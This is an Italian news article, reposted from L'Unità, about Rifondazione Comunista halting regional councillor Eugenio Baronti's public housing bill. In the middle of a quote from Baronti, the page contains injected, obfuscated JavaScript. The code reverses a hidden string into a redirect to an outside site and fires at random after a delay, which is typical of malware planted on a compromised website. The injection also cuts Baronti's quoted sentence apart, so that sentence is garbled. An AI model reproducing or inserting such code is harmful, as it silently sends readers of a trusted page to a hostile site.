PRC stoppa l'assessore che recupera 500 milioni per le case popolari

image_pdfimage_print

La scorsa settimana l’assessore regionale alla casa, Eugenio Baronti del Prc aveva ricevuto una busta con un proiettile. Ieri ha incassato la solidarietà del proprio partito e del proprio gruppo in Regione. Ma anche uno stop alla proposta di legge sulle case popolari che è all’esame del consiglio regionale.

LO STOP DEL PRC  – Sia il segretario regionale del Prc Stefano Cristiano che la capogruppo Monica Sgherri, seduti a fianco di Baronti in conferenza stampa, difendono la proposta. Cristiano spiega che anche loro sono contrari alla svendita degli alloggi popolari e che non ce nessun aumento sproporzionato dei canoni attuali. E la Sgherri chiede alla Regione di mettere la questione “casa” ai primi punti del Dpef perché oramai fa tutt’uno con la crisi: «La gente perde il lavoro e poi anche la casa – dice – visto che la maggior parte degli sfratti oramai è per morosità incolpevole ». E tuttavia poi nel documento Rifondazione spiega che la discussione sulla “legge Baronti” va sospesa in attesa di sapere cosa proporrà il governo Berlusconi col suo “piano casa”. Uno stop che Baronti non commenta, ma non gradisce.

BARONTI: «VADO AVANTI» – «È una legge importante, discutiamone pure quanto vogliamo,ma sulla casa c’è da (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andare avanti». E ricorda che fin qui ha recuperato 121 milioni mai spesi (alcuni risalgono agli anni ‘90) e che a maggio sarà pronto il piano speciale per 130 milioni che serviranno a recuperare gli alloggi popolari oggi non utilizzabili (circa 700) e per acquistare dai privati (a prezzi di costo) appartamenti già pronti che i costruttori non stanno più vendendo e a costruire nuove case sui terreni pubblici, così l’iter è più veloce. Con la clausola che i comuni devono spenderli entro 6 mesi, se no li perdono. «E con la nuova legge – spiega Baronti – ci sarà anche un fondo (di 360 milioni in arrivo da Roma ndr) unico per la casa». Già, ma la legge ci sarà?

[Fonte L’Unità]

0 Comments

  1. Pingback: Piano Casa »  PRC stoppa l’assessore che recupera 500 milioni per le case popolari - l’Altracittà

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *